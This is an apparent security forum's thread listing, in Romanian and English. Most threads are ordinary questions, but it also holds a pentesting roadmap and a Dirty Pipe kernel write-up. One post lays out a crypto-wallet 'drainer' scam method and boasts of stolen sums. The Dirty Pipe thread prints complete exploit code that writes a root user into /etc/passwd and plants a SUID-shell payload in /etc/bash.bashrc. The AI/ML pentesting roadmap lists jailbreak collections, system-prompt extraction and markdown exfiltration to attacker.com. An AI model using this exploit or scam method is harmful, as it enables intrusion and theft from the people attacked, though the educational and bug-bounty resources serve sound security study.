All Forums

Salutare all

Sat, 04 Apr 2026 00:33:41 +0000

Va salut am o întrebare are cineva un cont de rockstar sa imi împrumute sa joc gta 5 online câteva zile max o săptămână

Open Tracker Signups, Applications, and Invites

Wed, 18 Mar 2026 19:28:59 +0000

Invitatii Trackers/Open Signups

Propunere schimbare nișă pentru forum

Tue, 17 Mar 2026 16:27:46 +0000

Dacă tot avem atâția ani de experiență în spate și încă mai știu o gramadă de persoane de RST, ce ar fi dacă am schimba direcția forumului către automatizări, tips & tricks, AI și monetizare, fără a intra vreodată în zona fraudei pe care am încercat mereu să o combatem? Am de 15 ani schițată metoda ideală de monetizare pentru RST, consider că încă este validă, și nu văd de ce nu am începe să facem bani și să îi ajutăm și pe alții să facă bani cu ajutorul nostru fără a încălca legislația. Admini și useri ce părere aveți? Îi dăm drumul la treabă? Ne dedicăm energia să facem o treabă serioasă care să aducă cu adevărat plus valoare, sau îi lăsăm pe toți diletanții de pe comunități ca BlackHatWorld să facă bani din mizerii, țepe și tutoriale care nu funcționează? Comunitatea RST a fost mereu corectă cu userii și nu a promovat țepe. De ce nu am face din treaba asta și din experiența noastră, a tuturor, un business din care să producem bani?

Ajutor deschidere baze de date contabile

Mon, 16 Mar 2026 17:10:28 +0000

Va salut! Am o situatie foarte grava in familie. Tata are o firma din 1996 unde e asociat unic, de pe care maica-mea fara niciun fel de imputernicire notariala i-a furat o gramada de marfa convingand fosta contabila ca tata e schizofrenic si convingand-o pe contabila sa nu tina legatura cu acesta, ci doar cu ea. Maica-mea si-a facut ea un alt SRL si a luat marfa de pe SRL-ul lui tata pe al ei falsificand semnatura tatalui meu in facturi si la Registrul Comertului. Am depus plangere la Politia Economica dar pare ca nu se misca nimic deocamdata. Intre timp a intentat si divort de el la judecatorie si s-a mutat la un amant. Contabila ne-a dat pe mail dosarele celor doua firme, dar nu reuseste nimeni sa le deschida ca sa vedem facturile. Evident ca acum fosta contabila nu mai raspunde la usa si telefon. Am incercat cu SAGA si alte programe de contabilitate dar nimic. Ma poate ajuta cineva? 😌 Gratitude for you! Atasez bazele de date: -

Daca ma poate ajuta careva

Sat, 14 Mar 2026 17:58:29 +0000

salutare, am si eu un cont de steam vechi de vreo 17 ani cred, inactiv de 9,10 ani, mi am uitat parola, iar cei de la steam nu accepta da mi trimita link pentru resetare parola decat daca le trimit un cd key, eu steam ul l am cumparat prin sms cum era pe vremuri , sms , luau euro din cont si primeam condul, acum nu mai am nimic decat acces la adresa de mail

Vand advertoriale in aproximativ 700 site uri din romania

Fri, 06 Mar 2026 07:56:30 +0000

Vand mai multe pachete de advertoriale la pret bun, site uri cu autoritate medie, sau mare si am si o oferta f buna, advertoriale pe 107 site uri cu 2500 lei

🔥💰 New Crypto method up to $100k Monthly for beginners and pros 🔥💰

Fri, 27 Feb 2026 21:32:39 +0000

Hello evryone , after many asked me to share this method i am tierd to answer evryone at private and explain , here is a full shared method with step by step , method i am talking about its crypto drainig , for those who don't know what is its a script you add to any scam page and its ask vectim to connect his crypto wallet as a legit action like for connecting , or claim somthing , once he connect he recive a signature request like any legit website , but inside this requsest there is a hdien request that givers permiison to take all crypto once signed Next, you need a good traffic method , a traffic method that will target crypto users. For me, I am using Twitter ads, targeting new projects, and posting free claims. I have a team working with me of 3 people. We are making until now this money: £91k. You can start with just a $100 budget for ads, and then you can go with more once you get hits. There are some people making over £1m in one hit—hit crazy, right? Our biggest hit ever was £466k. That's right, one good wallet can change your life. One more thing: be sure that you have a good method; don't just jump in with no knowledge or dig deep in the methods shared on panels like Exogator. Well, this is the end for now. If you have any questions, I will post a part 2 thread that answers these questions.

Large-scale online deanonymization with LLMs

Fri, 27 Feb 2026 14:27:32 +0000

We show that large language models can be used to perform at-scale deanonymization. With full Internet access, our agent can re-identify Hacker News users and Anthropic Interviewer participants at high precision, given pseudonymous online profiles and conversations alone, matching what would take hours for a dedicated human investigator. We then design attacks for the closed-world setting. Given two databases of pseudonymous individuals, each containing unstructured text written by or about that individual, we implement a scalable attack pipeline that uses LLMs to: (1) extract identityrelevant features, (2) search for candidate matches via semantic embeddings, and (3) reason over top candidates to verify matches and reduce false positives. Compared to classical deanonymization work (e.g., on the Netflix prize) that required structured data , our approach works directly on raw user content across arbitrary platforms. We construct three datasets with known ground-truth data to evaluate our attacks. The first links Hacker News to LinkedIn profiles, using crossplatform references that appear in the profiles. Our second dataset matches users across Reddit movie discussion communities; and the third splits a single user’s Reddit history in time to create two pseudonymous profiles to be matched. In each setting, LLM-based methods substantially outperform classical baselines, achieving up to 68% recall at 90% precision compared to near 0% for the best non-LLM method. Our results show that the practical obscurity protecting pseudonymous users online no longer holds and that threat models for online privacy need to be reconsidered. Download: https://arxiv.org/pdf/2602.16800

AI/ML Pentesting Roadmap

Fri, 27 Feb 2026 14:26:49 +0000

🛡️ AI/ML Pentesting Roadmap A comprehensive, structured guide to learning AI/ML security and penetration testing — from zero to practitioner. 📋 Table of Contents Prerequisites Phase 1 — Foundations Phase 2 — AI/ML Security Concepts Phase 3 — Prompt Injection & LLM Attacks Phase 4 — Hands-On Practice Phase 5 — Advanced Exploitation Techniques Phase 6 — Real-World Research & Bug Bounty Standards, Frameworks & References Tools & Repositories Books, PDFs & E-Books Video Resources CTF & Competitions Bug Bounty Programs Community & News Suggested Learning Path by Experience Level Prerequisites Before diving into AI/ML pentesting, ensure you have the following foundation: General Security Basics PortSwigger Web Security Academy — Free, hands-on web security training (XSS, SQLi, SSRF, etc.) TryHackMe — Pre-Security Path HackTheBox Academy OWASP Top 10 Programming (Python is essential) Python for Everybody — Coursera Automate the Boring Stuff with Python — Free online book CS50P — Python — Free Harvard course APIs & HTTP Understand REST APIs, HTTP methods, headers, and authentication flows Postman Learning Center Practice with tools: curl, Burp Suite, Postman Phase 1 — Foundations 1.1 Machine Learning Fundamentals Resource Type Cost Machine Learning — Andrew Ng (Coursera) Course Audit Free Introduction to ML — edX Course Audit Free fast.ai Practical Deep Learning Course Free Google Machine Learning Crash Course Course Free Kaggle ML Courses Course Free 3Blue1Brown — Neural Networks Video Free 1.2 Large Language Models (LLMs) Understanding how LLMs work is critical before attacking them. Resource Type Cost Andrej Karpathy — Intro to LLMs Video Free Andrej Karpathy — Let's build GPT Video Free Hugging Face NLP Course Course Free LLM University by Cohere Course Free Prompt Engineering Guide Guide Free Phase 2 — AI/ML Security Concepts 2.1 Core Security Concepts OWASP LLM Top 10 — The definitive OWASP list for LLM vulnerabilities MITRE ATLAS Matrix — Adversarial Tactics, Techniques, and Common Knowledge for AI systems NIST AI Risk Management Framework — Federal AI risk guidance IBM — AI Security Overview AI Village — LLM Threat Modeling Promptingguide — Adversarial Attacks HackerOne — Ultimate Guide to Managing Ethical and Security Risks in AI 2.2 Attack Surface Overview Key attack vectors in AI/ML systems: Prompt Injection — Manipulating LLM behavior through crafted inputs Jailbreaking — Bypassing safety filters and guardrails Model Inversion — Extracting training data from a model Membership Inference — Determining if data was in training set Data Poisoning — Corrupting training data to influence behavior Adversarial Examples — Perturbed inputs that fool classifiers Model Extraction/Stealing — Cloning a model via API queries Supply Chain Attacks — Malicious models/weights on platforms like Hugging Face Insecure Plugin/Tool Integration — Exploiting LLM agents with external tools Training Data Exfiltration — Extracting memorized private data Denial of Service — Overloading models via crafted prompts 2.3 MLOps & Infrastructure Security From MLOps to MLOops — JFrog Offensive ML Playbook AI Exploits — ProtectAI Awesome AI Security — ottosulin Phase 3 — Prompt Injection & LLM Attacks 3.1 Understanding Prompt Injection IBM Guide on Prompt Injection Simon Willison's Explanation of Prompt Injection Learn Prompting — Prompt Hacking and Injection PortSwigger LLM Attacks NCC Group — Exploring Prompt Injection Attacks Bugcrowd — AI Vulnerability Deep Dive: Prompt Injection 3.2 Jailbreaking Techniques DAN (Do Anything Now) — Classic jailbreak technique: Chatgpt-DAN Repo Role-playing / Persona manipulation Token smuggling — Encoding instructions to bypass filters Prompt leaking — Extracting system prompts Indirect prompt injection — Attacks via documents, web content, memory WideOpenAI — Jailbreak Collection PayloadsAllTheThings — Prompt Injection PALLMs — Payloads for Attacking LLMs 3.3 Indirect Prompt Injection A more sophisticated attack where malicious instructions are injected via external data sources (emails, documents, websites) that an LLM agent processes. Greshake — LLM Security / Not What You've Signed Up For Embrace The Red — Blog — Comprehensive blog covering real-world indirect injection GitHub Copilot Chat: Prompt Injection to Data Exfiltration Google AI Studio Data Exfiltration 3.4 Advanced Prompt Attack Techniques How to Persuade an LLM to Change Its System Prompt Bugcrowd Ultimate Guide to AI Security (PDF) Snyk OWASP Top 10 LLM (PDF) Vanna.AI Prompt Injection RCE — JFrog Phase 4 — Hands-On Practice 4.1 Interactive Platforms & Games Platform Description Link Gandalf LLM prompt testing game — extract the password gandalf.lakera.ai Prompt Airlines Gamified prompt injection learning promptairlines.com Crucible Interactive AI security challenges by Dreadnode crucible.dreadnode.io Immersive Labs AI Structured AI security exercises prompting.ai.immersivelabs.com Secdim AI Games Prompt injection games play.secdim.com/game/ai HackAPrompt Community prompt injection competition hackaprompt.com PortSwigger LLM Labs Hands-on web LLM attack labs Web Security Academy 4.2 Vulnerable-by-Design Projects Repository Description Damn Vulnerable LLM Agent — WithSecureLabs Intentionally vulnerable LLM agent ScottLogic Prompt Injection Playground Local prompt injection lab Greshake LLM Security Tools Proof-of-concept attacks 4.3 CTF Writeups to Study CTF Writeup — HackPack CTF 2024 LLM Edition LLM Pentest Writeups — System Weakness Phase 5 — Advanced Exploitation Techniques 5.1 Agent & Tool Integration Attacks When LLMs are integrated with tools (code execution, web browsing, file systems), the attack surface expands dramatically. LLM Pentest: Leveraging Agent Integration for RCE — BlazeInfoSec LLM Pentest: Leveraging Agent Integration For RCE (full) Dumping a Database with an AI Chatbot — Synack CSWSH Meets LLM Chatbots 5.2 Data Exfiltration via LLMs Google AI Studio: LLM-Powered Data Exfiltration Google AI Studio Mass Data Exfil (Regression) Hacking Google Bard — From Prompt Injection to Data Exfiltration AWS Amazon Q Markdown Rendering Vulnerability GitHub Copilot Chat Data Exfiltration 5.3 Account Takeover & Authentication Attacks ChatGPT Account Takeover — Wildcard Web Cache Deception Shockwave — Critical ChatGPT Vulnerability (Web Cache Deception) Security Flaws in ChatGPT Ecosystem — Salt Security OpenAI Allowed Unlimited Credit on New Accounts — Checkmarx 5.4 XSS & Web Vulnerabilities in AI Products XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT — Imperva Zeroday on GitHub Copilot 5.5 Model & Infrastructure Attacks Shelltorch Explained: Multiple Vulnerabilities in TorchServe (CVSS 9.9) From ChatBot to SpyBot: ChatGPT Post-Exploitation — Imperva 5.6 Persistent Attacks & Memory Exploitation ChatGPT Persistent Denial of Service via Memory Attacks — Embrace the Red 5.7 Adversarial Machine Learning CleverHans Library — Adversarial example library ART (Adversarial Robustness Toolbox) — IBM Foolbox — Python toolbox for adversarial attacks Phase 6 — Real-World Research & Bug Bounty 6.1 Notable Research & Disclosures We Hacked Google AI for $50,000 — LandH New Google Gemini Content Manipulation Vulnerabilities — HiddenLayer Jailbreak of Meta AI (Llama 3.1) Revealing Config Details Bypass Instructions to Manipulate Google Bard My LLM Bug Bounty Journey on Hugging Face Hub Anonymised Penetration Test Report — Volkis Lakera Real World LLM Exploits (PDF) 6.2 How to Find LLM Vulnerabilities Key areas to test when assessing an LLM-powered application: System prompt extraction — Can you leak the hidden system prompt? Instruction override — Can you ignore system-level instructions? Plugin/tool abuse — Can agent tools be misused (SSRF, RCE, SQLi)? Data exfiltration via markdown — Does the UI render ![](https://attacker.com?q=...) ? Persistent injection via memory — Can you inject instructions that persist in memory/RAG? PII leakage — Does the model reveal training data or other users' data? Cross-user data leakage — In multi-tenant apps, can you access other users' contexts? Authentication bypass — Can you trick the LLM into performing privileged actions? Standards, Frameworks & References Resource Description OWASP LLM Top 10 Top 10 LLM vulnerability classes MITRE ATLAS AI adversarial threat matrix NIST AI RMF US Federal AI risk management framework OWASP AI Exchange Cross-industry AI security guidance ISO/IEC 42001 International AI management standard ENISA AI Threat Landscape EU AI threat landscape report Google Secure AI Framework (SAIF) Google's AI security framework Tools & Repositories Offensive Tools Tool Purpose Garak LLM vulnerability scanner PyRIT Microsoft's Python Risk Identification Toolkit for LLMs LLM Fuzzer Fuzzing framework for LLMs PALLMs Payloads for attacking LLMs PromptInject Prompt injection attack framework PurpleLlama / CyberSecEval Meta's LLM security evaluation Defensive / Scanning Tools Tool Purpose Rebuff Prompt injection detection NeMo Guardrails NVIDIA guardrail framework Lakera Guard Commercial prompt injection protection AI Exploits — ProtectAI Real-world ML exploit collection ModelScan Scan ML model files for malicious code Reference Lists Resource Description Awesome LLM Security — corca-ai Curated LLM security list Awesome LLM — Hannibal046 Everything LLM including security Awesome AI Security — ottosulin General AI security resources LLM Hacker's Handbook Comprehensive hacking handbook PayloadsAllTheThings — Prompt Injection Payload collection WideOpenAI Jailbreak and bypass collection Chatgpt-DAN DAN jailbreak collection Books, PDFs & E-Books Resource Link LLM Hacker's Handbook GitHub OWASP Top 10 for LLM (Snyk) PDF Bugcrowd Ultimate Guide to AI Security PDF Lakera Real World LLM Exploits PDF HackerOne Ultimate Guide to Managing AI Risks E-Book Adversarial Machine Learning — Goodfellow et al. arXiv Video Resources Resource Link Penetration Testing Against and With AI/LLM/ML (Playlist) YouTube Andrej Karpathy — Intro to Large Language Models YouTube DEF CON AI Village Talks YouTube LiveOverflow — AI/ML Security YouTube 3Blue1Brown — Neural Networks Series YouTube John Hammond — AI Security Challenges YouTube Cybrary — Machine Learning Security Cybrary CTF & Competitions Competition Description Link Crucible Ongoing AI security challenges crucible.dreadnode.io HackAPrompt Annual prompt injection competition hackaprompt.com AI Village CTF (DEF CON) Annual AI security CTF at DEF CON aivillage.org Gandalf Self-paced LLM challenge gandalf.lakera.ai Prompt Airlines Gamified injection challenges promptairlines.com Hack The Box AI Challenges HTB AI-themed challenges hackthebox.com Secdim AI Games Web-based AI security games play.secdim.com/game/ai Bug Bounty Programs AI/ML security bug bounties are growing rapidly. Target these platforms: Program Scope Link OpenAI Bug Bounty ChatGPT, API, plugins bugcrowd.com/openai Google AI Bug Bounty Gemini, Bard, Vertex AI bughunters.google.com Meta AI Bug Bounty Llama models, Meta AI facebook.com/whitehat HuggingFace via ProtectAI Hub, models, spaces huntr.com Anthropic Bug Bounty Claude, API anthropic.com/security Microsoft (Copilot, Azure AI) Copilot, Azure OpenAI msrc.microsoft.com Huntr (AI/ML focused) Open source ML libraries huntr.com Tips for AI bug bounty: Focus on data exfiltration via markdown rendering (common finding) Test plugin/tool integrations thoroughly Look for prompt injection in RAG pipelines Explore memory and persistent context manipulation Check for cross-tenant data leakage in multi-user deployments Community & News Communities AI Village — DEF CON's AI security community OWASP AI Exchange — Open standard for AI security ProtectAI — AI security research and tools Embrace the Red — Blog — Leading blog on LLM security Kai Greshake's Research — Indirect prompt injection research Newsletters & Blogs The Batch — DeepLearning.AI — Weekly AI news Simon Willison's Weblog — Authoritative LLM security commentary HiddenLayer Research — AI security research Lakera Blog — LLM security insights PortSwigger Research — Web + AI security research Suggested Learning Path by Experience Level 🟢 Beginner (0–3 months) Complete PortSwigger Web Security Academy fundamentals Learn Python basics Take Google ML Crash Course Read OWASP LLM Top 10 Play Gandalf — all levels Read Simon Willison's prompt injection article Watch Andrej Karpathy — Intro to LLMs 🟡 Intermediate (3–9 months) Study MITRE ATLAS Matrix Complete PortSwigger LLM Attack labs Set up and exploit Damn Vulnerable LLM Agent Complete Prompt Airlines and Crucible challenges Read the LLM Hacker's Handbook Study the Embrace the Red blog in full Experiment with Garak and PyRIT Try Offensive ML Playbook 🔴 Advanced (9+ months) Participate in AI Village CTF at DEF CON Submit findings to Huntr or OpenAI Bug Bounty Study adversarial ML with ART and CleverHans Read academic papers on model inversion, membership inference, and data extraction Contribute to open source tools like Garak or AI Exploits Build your own vulnerable LLM demo environment Write and publish research — blog posts, CVEs, conference talks Key Academic Papers Paper Year Explaining and Harnessing Adversarial Examples — Goodfellow et al. 2014 Extracting Training Data from Large Language Models — Carlini et al. 2021 Not What You've Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection — Greshake et al. 2023 Membership Inference Attacks against Machine Learning Models — Shokri et al. 2017 Universal and Transferable Adversarial Attacks on Aligned Language Models — Zou et al. 2023 Jailbroken: How Does LLM Safety Training Fail? — Wei et al. 2023 Prompt Injection attack against LLM-integrated Applications 2023 Last updated: 2025 | Contributions welcome — submit a PR with new resources. Sursa: https://github.com/anmolksachan/AI-ML-Free-Resources-for-Security-and-Prompt-Injection

[Q] Sfaturi pentru un viitor in CyberSecurty?

Thu, 26 Feb 2026 23:01:50 +0000

Vreau sa incep sa lucrez la ceva pentru viitorul meu, cu ce ar trebuii sa incep pentru un viitor legat de securitatea cibernetica?

Malwarebytes Smoking Crack (0day + Banger Song)

Sat, 21 Feb 2026 11:35:46 +0000

Ati vazut asta? #UwU Underground

Linux Kernel Dirty Pipe Exploitation (Logic Bug — CVE-2022–0847)

Thu, 19 Feb 2026 07:14:59 +0000

by: Antonius (w1sdom) https://www.bluedragonsec.com https://github.com/bluedragonsecurity Dirty Pipe (CVE-2022–0847) is one of the most significant security vulnerabilities in Linux Kernel 5.8–5.15.24, discovered by Max Kellermann in 2022. This vulnerability allows ordinary users (without special privileges) to overwrite data in files that should be read-only. 6.3.3.1. Understanding Core Concepts Before discussing Dirty Pipe in detail, here are some Linux kernel internal concepts that need to be understood: 1. Paging Paging is a memory management mechanism in the Linux kernel where the memory system divides physical memory into fixed-size small blocks called page frames, and virtual memory is divided into blocks of the same size called pages. This mechanism allows the kernel to map virtual address space of processes to physical memory in a non-sequential manner, which is crucial for efficiency and security in modern systems. 2. Page (Virtual Memory) In Linux, a page is the smallest unit of physical memory management handled by the kernel. Analogy: RAM is like a giant book. A page is one sheet of paper in that book. The kernel doesn’t move data bit by bit, but rather sheet by sheet (page by page). Generally, on modern system architectures (such as x86_64), the standard size of one page is 4 KB (4096 bytes). 3. Page Cache This is a crucial part. Linux doesn’t read files directly from disk every time because it’s slow. The kernel copies file contents into RAM called the Page Cache. When we read a file, the kernel loads it into the Page Cache. If another process wants to read the same file, the kernel only provides a reference to the page that already exists in that memory. Page cache resides in kernel space. 4. Pipe Buffer Pipe is an Inter-Process Communication (IPC) mechanism. Internally, the kernel manages pipes using the pipe_inode_info data structure. Data inside a pipe is stored in a “buffer” called Pipe Buffer. Ring Buffer: The kernel uses a circular (ring) structure to manage this buffer. A ring buffer is a data structure that uses a single array with a fixed size as if its end is connected back to its beginning. This creates a data flow that “rotates” endlessly. Flags: Each buffer has attributes or “flags” that determine its behavior (for example, whether the buffer can be merged). Pipe buffer resides in kernel space. 5. Pipe Buffer Flag (PIPE_BUF_FLAG_CAN_MERGE) The PIPE_BUF_FLAG_CAN_MERGE flag was introduced in Linux Kernel version 5.8. This is where the main vulnerability lies. The flag named PIPE_BUF_FLAG_CAN_MERGE. Its function: Tells the kernel that new data written to the pipe can be merged into an existing buffer. The problem: Before the Dirty Pipe fix, the kernel did not properly clear (reset) this flag when performing splice(). 6. Splice splice() is a syscall for moving data between two file descriptors without copying the data between kernel space and user space. This is often referred to as a Zero-copy mechanism. The splice() syscall is the “main actor” in Dirty Pipe: Instead of physically copying data, splice() performs optimization by making the Pipe Buffer point directly to the page in the Page Cache. This means the pipe doesn’t contain a copy of the file data, but only a “pointer” to the file’s physical memory. 7. Copy on Write (CoW) The Copy-on-Write (CoW) mechanism is a memory management optimization strategy used by the Linux kernel to delay data copying until absolutely necessary. The relationship between Copy-on-Write (CoW) and the Dirty Pipe exploit (CVE-2022–0847) is about how a small bug in the Linux kernel successfully “tricks” the CoW mechanism, allowing data to be written to files that should be read-only. 8. Dirty Page A dirty page is a memory page in RAM that has been modified by an application, but the changes have not yet been written back to secondary storage (such as SSD or hard disk). 6.3.3.2. Analysis of Dirty Pipe Vulnerability Dirty Pipe is a type of logic bug in pipe buffer handling in Linux kernel 5.8 through Linux kernel 5.15.24. The main problem lies in the Pipe mechanism (inter-process communication channel) and how the kernel manages the Page Cache (memory that stores copies of file data from disk). The core issue is a bug in the PIPE_BUF_FLAG_CAN_MERGE flag. The main problem lies in the kernel’s failure to properly re-initialize this flag (logic bug). Here is the code analysis: In the copy_page_to_iter_pipe and push_to_pipe functions in the Linux kernel before version 5.16.11, when performing splice operations, the kernel prepares the pipe_buffer structure but forgets to clean the .flags member. Vulnerable Code Structure: Location of problem: fs/pipe.c or include/linux/pipe_fs_i.h // Location of problem: fs/pipe.c or include/linux/pipe_fs_i.h struct pipe_buffer { struct page *page; unsigned int offset, len; const struct pipe_buf_operations *ops; unsigned int flags; // <--- THIS FLAG IS NOT RESET unsigned long private; }; Code Before Patch (Vulnerable): // lib/iov_iter.c - Before CVE-2022-0847 patch static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes, struct iov_iter *i) { // ---------snip----------- struct pipe_buffer *buf = &pipe->bufs[head & mask]; buf->ops = &page_cache_pipe_buf_ops; buf->page = page; buf->offset = offset; buf->len = bytes; // PROBLEM: buf->flags NOT TOUCHED AT ALL // --------snip---------------------- } Code After Patch (Fixed): buf->ops = &page_cache_pipe_buf_ops; buf->page = page; buf->offset = offset; buf->len = bytes; buf->flags = 0; // <--- TOTAL RESET TO ZERO Why is buf->flags = 0 better than just turning off a specific flag? Because pipe_buffer is a reused structure. If we only turn off one flag (CAN_MERGE), other garbage flags from previous pipe usage (such as PIPE_BUF_FLAG_GIFT or other custom flags) might still remain and cause strange behavior or new security holes in the future. Setting it to 0 ensures the buffer is in a completely “clean” state. Why Can This Be Exploited? Here is the Dirty Pipe exploitation flow: Pollution Stage: The attacker inserts data into the pipe via write(). A regular write() operation will set buf->flags = PIPE_BUF_FLAG_CAN_MERGE. Drain Stage: The attacker reads that data. The buffer is now logically “empty”, but its structure still exists in kernel memory with the CAN_MERGE flag still active. Splice Stage: When the splice() syscall maps a read-only file to a pipe, the copy_page_to_iter_pipe() function is called. Due to the bug above, it fills buf->page with the original file’s memory page but doesn’t reset buf->flags. Execution: The kernel thinks this file buffer can still be merged. The next write to the pipe won’t create a new buffer, but will actually modify directly the memory page (Page Cache) that was mapped earlier. At this stage, the attacker’s data is already stored in RAM. A page in RAM whose contents differ from what’s on disk is called a “Dirty Page”. If this stage is successfully reached, it means the exploitation has succeeded! Once the Page Cache changes, the effect is instant. If we overwrite /etc/passwd in RAM, we can immediately run su root at that very moment. 6.3.3.3. Dirty Pipe Exploitation For Dirty Pipe exploitation, we don’t need to disable any kernel protections because all kernel protections are irrelevant to prevent this logic bug. To exploit the Dirty Page logic bug, our exploit will perform the following steps: Step 1. Prepare the pipe and fill the pipe until full with the goal of triggering the PIPE_BUF_FLAG_CAN_MERGE flag. pipe(p); int capacity = fcntl(p[1], 1032); static char dummy[4096]; for (int r = capacity; r > 0; ) { int n = r > sizeof(dummy) ? sizeof(dummy) : r; write(p[1], dummy, n); r -= n; } Step 2. Empty the pipe. for (int r = capacity; r > 0; ) { int n = r > sizeof(dummy) ? sizeof(dummy) : r; read(p[0], dummy, n); r -= n; } Step 3. Use splice() to insert data from the target file into the pipe. if (splice(fd, &offset, p[1], NULL, 1, 0) < 0) { perror("[-] splice failed"); return 0; } Step 4. Write the payload data to the pipe. write(p[1], payload, strlen(payload)); Complete Exploit Code for Dirty Pipe Exploitation /* Exploit Title: Linux Kernel 5.8 < 5.15.25 - Local Privilege Escalation (DirtyPipe 2) Exploit Author: Antonius (w1sdom) github : https://github.com/bluedragonsecurity web : https://www.bluedragonsec.com tested on : - linux kernel 5.13.0-21-generic (compiled on lubuntu 20.04.5) - linux lubuntu 20.04.2 - linux kernel 5.8 Original Author: Max Kellermann (max.kellermann@ionos.com) CVE: CVE-2022-0847 * Copyright 2022 CM4all GmbH / IONOS SE * * author: Max Kellermann * * Proof-of-concept exploit for the Dirty Pipe * vulnerability (CVE-2022-0847) caused by an uninitialized * "pipe_buffer.flags" variable. It demonstrates how to overwrite any * file contents in the page cache, even if the file is not permitted * to be written, immutable or on a read-only mount. * * This exploit requires Linux 5.8 or later; the code path was made * reachable by commit f6dd975583bd ("pipe: merge * anon_pipe_buf*_ops"). The commit did not introduce the bug, it was * there before, it just provided an easy way to exploit it. * * There are two major limitations of this exploit: the offset cannot * be on a page boundary (it needs to write one byte before the offset * to add a reference to this page to the pipe), and the write cannot * cross a page boundary. * * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n' * * Further explanation: https://dirtypipe.cm4all.com/ */ #define _GNU_SOURCE #include #include #include #include #include #include #include int validate_kernv() { struct utsname buffer; int major, minor, patch; int is_vulnerable = 0; char *version_str; int len, compile_year; if (uname(&buffer) != 0) { perror("uname"); return 1; } version_str = buffer.version; len = strlen(version_str); compile_year = 0; for (int i = len - 4; i >= 0; i--) { if (isdigit(version_str[i]) && isdigit(version_str[i+1]) && isdigit(version_str[i+2]) && isdigit(version_str[i+3])) { compile_year = atoi(&version_str[i]); break; } } if (compile_year < 2023) { is_vulnerable = 1; } int fields = sscanf(buffer.release, "%d.%d.%d", &major, &minor, &patch); if (fields < 3) patch = 0; if (major == 5) { if (minor >= 8 && minor <= 14) { is_vulnerable = 1; } else if (minor == 15 && patch < 25) { is_vulnerable = 1; } } else { printf("[-] kernel is not vulnerable !!! quitting ..."); exit(-1); } if (is_vulnerable) { printf("[*] kernel is vulnerable\n"); } else { printf("[-] kernel is not vulnerable !!! quitting ..."); exit(-1); } return 0; } void prepare_pipe(int p[2]) { pipe(p); int capacity = fcntl(p[1], 1032); static char dummy[4096]; for (int r = capacity; r > 0; ) { int n = r > sizeof(dummy) ? sizeof(dummy) : r; write(p[1], dummy, n); r -= n; } for (int r = capacity; r > 0; ) { int n = r > sizeof(dummy) ? sizeof(dummy) : r; read(p[0], dummy, n); r -= n; } } int inject_payload(char *target, char *payload) { int fd = open(target, O_RDONLY); int p[2]; __off64_t offset = 1; prepare_pipe(p); fd = open(target, O_RDONLY); if (fd < 0) return 1; if (splice(fd, &offset, p[1], NULL, 1, 0) < 0) { perror("[-] splice failed"); return 0; } printf("[*] injecting payload to %s\n", target); write(p[1], payload, strlen(payload)); return 1; } void bashrc() { char *target = "/etc/bash.bashrc"; char *payload = "\ncp /bin/bash /tmp/x; chmod +s /tmp/x\n#"; if (inject_payload(target, payload) == 0) { printf("[-] failed to inject payload !"); } else { printf("[*] payload injected to %s\n", target); printf("[*] you need to wait for root to login\n"); printf("[*] once the root logged in you will get suid shell on /tmp/x\n"); printf("[*] get root by : /tmp/x -p\n"); } } int toor_check() { FILE *fp; char path[1035]; fp = popen("su toor -c id", "r"); if (fp == NULL) { return 0; } if (fgets(path, sizeof(path), fp) != NULL) { if (strstr(path, "root")) { return 1; } } pclose(fp); return 0; } int passwd() { char *target = "/etc/passwd"; char *payload = "\ntoor::0:0:root:/root:/bin/bash\n#"; system("cp /etc/passwd /tmp/passwd.bak"); if (inject_payload(target, payload) == 0) { printf("[-] failed to inject payload !"); } if (toor_check() == 1) { printf("[+] exploitation success, getting root for you.\n"); system("su toor"); } else { printf("[-] failed on method 1, testing method 2\n"); return 0; } return 1; } int main() { validate_kernv(); if (passwd() == 0) { bashrc(); } return 0; } Note: The complete exploit code contains functions for kernel version validation, pipe preparation, payload injection, and two different exploitation methods targeting /etc/passwd and /etc/bash.bashrc. Exploitation Methods The exploit above uses 2 different payloads with the goal that if the first payload fails, it will be chained by the second payload. Payload 1: Writes to /etc/passwd to add a new user named ‘toor’ with uid 0. If this payload succeeds, we can immediately get root shell. Payload 2: Aims to drop a SUID bash shell at /tmp/x. Specifically for the second payload, it must wait for the root user on the system to login because the payload to drop the SUID shell is injected into /etc/bash.bashrc. In Linux, commands contained in /etc/bash.bashrc are executed by every user who logs into the system at login time. # Testing the Exploit In this example, I used Linux kernel 5.13 running on Lubuntu 20.04.5 in VirtualBox as a guest OS and the host OS is Kali Linux 2025.4. On the Lubuntu 20.04.5 machine, compile the exploit: gcc -o dirtypipe2 dirtypipe2.c Run the exploit: ./dirtypipe2 and finally, we got root shell : Press enter or click to view image in full size References Original disclosure: https://dirtypipe.cm4all.com/ CVE-2022–0847: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847 Linux Kernel patch: commit 9d2231c5d74e13b2a0546fee6737ee4446017903 Exploit code: https://github.com/bluedragonsecurity

Hello from Indonesia

Thu, 19 Feb 2026 07:11:55 +0000

Hello buddy ! I am from Indonesia, I am a Chinese born in Indonesia. I just notice this forum after doing google search for a linux kernel rootkit that I created in 2014. Here's the topic : I thinks this forum is cool and it will be nice to register here , in my past time, I have some friends from Europe some Albanian hacker friends in my past time such as x-hack, danzel a greece friend : getch is Romania near to Albania and Greece ?

Client OPNsense (pFsense)

Sun, 15 Feb 2026 17:49:12 +0000

Bună seara Încerc de ceva timp să înlocuiesc un router comercial "de top" cu un mini pc pe care am instalat OPNsense (și înainte pfSense). Acest mini pc transformat în router doresc să devină clientul mai multor servere VPN. Certificatele sunt emise de routere consumer și nu au formatul necesar (X.509). Ce soluții aș avea? Un tutorial ? P.S sunt un novice Mulțumesc

Cum merge bosilor hackereala pe la birou ?

Tue, 03 Feb 2026 23:25:46 +0000

Bosilor, cum merge hackareala pe la biroul de corporatristi ?? N-am mai intrat de anul trecut. La mine merge de rupe... In ianuarie a bubuit treaba, peste 1,5 milioane de coco venit. Chinezii de la Huione au ajuns la 10-20 de miliarde de coco furati anul trecut... deci sunt un pestisor pe langa chinezii aia... Pe la voi la birou cum merge cu hackareala ?? Gasiti bug-uri din alea sa va platiti ratele si sa cumparati pateul bucegi ? Va mai sponsorizeaza astia sa mergeti pe la 2-3 conferinte pe an ca sa adormiti prin sala ???

Webshell needed

